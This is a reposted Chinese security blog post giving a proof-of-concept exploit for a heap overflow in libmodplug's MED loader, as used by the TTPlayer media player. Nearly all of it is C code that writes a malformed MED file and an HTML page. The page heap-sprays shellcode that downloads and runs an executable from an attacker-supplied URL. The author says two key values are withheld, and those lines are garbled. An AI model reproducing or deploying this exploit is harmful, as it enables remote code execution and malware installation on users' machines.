本文共 6847 字,大约阅读时间需要 22 分钟。
导读:上个月看的洞,昨天晚上又重新翻看了一下这个洞,终于看到了成功利用的可能性。
远程和本地攻击最后都可以,本地攻击成功比较低一些,头疼。详细的利用代码不贴了,详细可以看看 libmod 的源码下面是远程部分 poc, 2个关键 DWORD 值隐藏了.
代码:
/*libmodplug v0.8load_med.cppBOOL CSoundFile::ReadMed(const BYTE *lpStream, DWORD dwMemLength)line 670: memcpy(m_lpszSongComments, lpStream+annotxt, annolen);
千千静听使用的是 libmod 来进行 mod 类文件格式的处理, 此库在 ReadMed 函数中,没有检查
文件描述的长度,如果传递一个恶意构造的值,将导致堆溢出。现在采用libmod 软件很多,都应该存在此问题。 */
/*
author: dummye-mail: dummyz@126.com date: 2008/02/25
*/ #include
#include #pragma pack(1)
typedef struct tagMEDMODULEHEADER
{ DWORD id; // MMD1-MMD3DWORD modlen; // Size of fileDWORD song; // Position in file for this songWORD psecnum;WORD pseq;DWORD blockarr; // Position in file for blocksDWORD mmdflags;DWORD smplarr; // Position in file for samplesDWORD reserved;DWORD expdata; // Absolute offset in file for ExpData (0 if not present)DWORD reserved2;WORD pstate;WORD pblock;WORD pline;WORD pseqnum;WORD actplayline;BYTE counter;BYTE extra_songs; // # of songs - 1} MEDMODULEHEADER; typedef struct tagMMD0SAMPLE
{ WORD rep, replen;BYTE midich;BYTE midipreset;BYTE svol;signed char strans;} MMD0SAMPLE; // MMD0/MMD1 song header
typedef struct tagMMD0SONGHEADER{ MMD0SAMPLE sample[63];WORD numblocks; // # of blocksWORD songlen; // # of entries used in playseqBYTE playseq[256]; // Play sequenceWORD deftempo; // BPM temposigned char playtransp; // Play transposeBYTE flags; // 0×10: Hex Volumes | 0×20: ST/NT/PT Slides | 0×40: 8 Channels songBYTE flags2; // [b4-b0]+1: Tempo LPB, 0×20: tempo mode, 0×80: mix_conv=onBYTE tempo2; // tempo TPLBYTE trkvol[16]; // track volumesBYTE mastervol; // master volumeBYTE numsamples; // # of samples (max=63)} MMD0SONGHEADER; typedef struct tagMMD0EXP
{ DWORD nextmod; // File offset of next HdrDWORD exp_smp; // Pointer to extra instrument dataWORD s_ext_entries; // Number of extra instrument entriesWORD s_ext_entrsz; // Size of extra instrument dataDWORD annotxt;DWORD annolen;DWORD iinfo; // Instrument namesWORD i_ext_entries; WORD i_ext_entrsz;DWORD jumpmask;DWORD rgbtable;BYTE channelsplit[4]; // Only used if 8ch_conv (extra channel for every nonzero entry)DWORD n_info;DWORD songname; // Song nameDWORD songnamelen;DWORD dumps;DWORD mmdinfo;DWORD mmdrexx;DWORD mmdcmd3x;DWORD trackinfo_ofs; // ptr to song->numtracks ptrs to tag listsDWORD effectinfo_ofs; // ptr to group ptrsDWORD tag_end;} MMD0EXP; #pragma pack()
// Byte swapping functions from the GNU C Library and libsdl
/* Swap bytes in 16 bit value. */
#ifdef __GNUC__# define bswap_16(x) /(__extension__ /({ unsigned short int __bsx = (x); /((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8)); }))#elsestatic __inline unsigned short intbswap_16 (unsigned short int __bsx){ return ((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8));}#endif /* Swap bytes in 32 bit value. */
#ifdef __GNUC__# define bswap_32(x) /(__extension__ /({ unsigned int __bsx = (x); /((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0×00ff0000) >> 8) | /(((__bsx) & 0×0000ff00) << 8) | (((__bsx) & 0×000000ff) << 24)); }))#elsestatic __inline unsigned intbswap_32 (unsigned int __bsx){ return ((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0×00ff0000) >> 8) |(((__bsx) & 0×0000ff00) << 8) | (((__bsx) & 0×000000ff) << 24));}#endif #ifdef WORDS_BIGENDIAN
#define bswapLE16(X) bswap_16(X)#define bswapLE32(X) bswap_32(X)#define bswapBE16(X) (X)#define bswapBE32(X) (X)#else#define bswapLE16(X) (X)#define bswapLE32(X) (X)#define bswapBE16(X) bswap_16(X)#define bswapBE32(X) bswap_32(X)#endif #define FILE_SIZE_ 0×30000
// 远程攻击#if 0// 成功率很低#define NOP_ "/"%u090a?/""#define HEAP_ADDR_ 码#else// 成功率很高#define NOP_ "/"邐邐/""#define HEAP_ADDR_ 码 #endif
const unsigned char shellcode[174] =
{ // 必须是偶数大小0xE8, 0×00, 0×00, 0×00, 0×00, 0×6A, 0×03, 0xEB, 0×21, 0×7E, 0xD8, 0xE2, 0×73, 0×98, 0xFE, 0×8A, 0×0E, 0×8E, 0×4E, 0×0E, 0xEC, 0×55, 0×52, 0×4C, 0×4D, 0×4F, 0×4E, 0×00, 0×00, 0×36, 0×1A, 0×2F, 0×70, 0×63, 0×3A, 0×5C, 0×63, 0×2E, 0×65, 0×78, 0×65, 0×00, 0×59, 0×5F, 0xAF, 0×67, 0×64, 0xA1, 0×30, 0×00, 0×8B, 0×40, 0×0C, 0×8B, 0×70, 0×1C, 0xAD, 0×8B, 0×68, 0×08, 0×51, 0×8B, 0×75, 0×3C, 0×8B, 0×74, 0×2E, 0×78, 0×03, 0xF5, 0×56, 0×8B, 0×76, 0×20, 0×03, 0xF5, 0×33, 0xC9, 0×49, 0×41, 0xAD, 0×03, 0xC5, 0×33, 0xDB, 0×0F, 0xBE, 0×10, 0×38, 0xF2, 0×74, 0×08, 0xC1, 0xCB, 0×0D, 0×03, 0xDA, 0×40, 0xEB, 0xF1, 0×3B, 0×1F, 0×75, 0xE7, 0×5E, 0×8B, 0×5E, 0×24, 0×03, 0xDD, 0×66, 0×8B, 0×0C, 0×4B, 0×8B, 0×5E, 0×1C, 0×03, 0xDD, 0×8B, 0×04, 0×8B, 0×03, 0xC5, 0xAB, 0×59, 0xE2, 0xBC, 0×8B, 0×0F, 0×80, 0xF9, 0×63, 0×74, 0×0A, 0×57, 0xFF, 0xD0, 0×95, 0xAF, 0xAF, 0×6A, 0×01, 0xEB, 0xAC, 0×52, 0×52, 0×57, 0×8D, 0×8F, 0xDB, 0×10, 0×40, 0×00, 0×81, 0xE9, 0×4E, 0×10, 0×40, 0×00, 0×51, 0×52, 0xFF, 0xD0, 0×6A, 0×01, 0×57, 0xFF, 0×57, 0xEC, 0xFF, 0×57, 0xE8, 0×90}; const char* script1 = /
"<script>""var sc=unescape(/"";const char* script2 = /"/");""fb=unescape(" NOP_ ");""while(fb.length<0×30000)fb+=fb;""m=new Array();""for(x=0;x<400;x++)m[x]=sc+fb+sc;""setTimeout(/'ttp.URL=/"";const char* script3 = /"/";ttp.controls.play();/', 3);</script>"""""; void make_med_file(const char* path)
{ MEDMODULEHEADER mmh;MMD0SONGHEADER msh;MMD0EXP mex;FILE* file;long p; memset(&mmh, 0, sizeof (mmh));
memset(&msh, 0, sizeof (msh));memset(&mex, 0, sizeof (mex)); p = 0;
mmh.id = 0×30444D4D; // version = '0'
p += sizeof (MEDMODULEHEADER);
mmh.song = bswapBE32(p); p += sizeof (MMD0SONGHEADER);
mmh.expdata = bswapBE32(p); p += sizeof (MMD0EXP);
mex.annolen = bswapBE32(-1);mex.annotxt = bswapBE32(p); file = fopen(path, "wb+");
if ( file == NULL ){ printf("create file failed!/n");exit(0);}else{ fwrite(&mmh, 1, sizeof (mmh), file);fwrite(&msh, 1, sizeof (msh), file);fwrite(&mex, 1, sizeof (mex), file); while ( ftell(file) < FILE_SIZE_ )
{ fwrite(HEAP_ADDR_, 1, 4, file);} fclose(file);
printf("successed!/n");}} void make_htlm_file(const char* htmlpath, const char* s3mpath, const char* url)
{ FILE *file = fopen(htmlpath, "w+");if ( file == NULL ){ printf("create '%s' failed!/n", htmlpath);exit(0);} fprintf(file, "%s", script1);
for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]); const unsigned l = strlen(url);
for ( unsigned j = 0; j < l; j += 2 )fprintf(file, "%%u%02X%02X" , url[j + 1], url[j]); fprintf(file, "%s%s%s", script2, s3mpath, script3);
fclose(file); printf("make '%s' successed!/n", htmlpath);
} int main(int argc, char* argv[])
{ printf("ttplayer stack exp poc by dummyz@126.com/n");if ( argc <= 1 ){ printf("need argv!(ex: %s http://xxx.xxx/xx.exe/n", argv[0]);return -1;} printf("+ make_med_file…/n");
make_med_file("c://shit.s3m"); printf("+ make_htlm_file…/n");
make_htlm_file("poc.html", "c://shit.s3m", argv[1]); printf("done./n");
return 0;}
转载地址:http://njiob.baihongyu.com/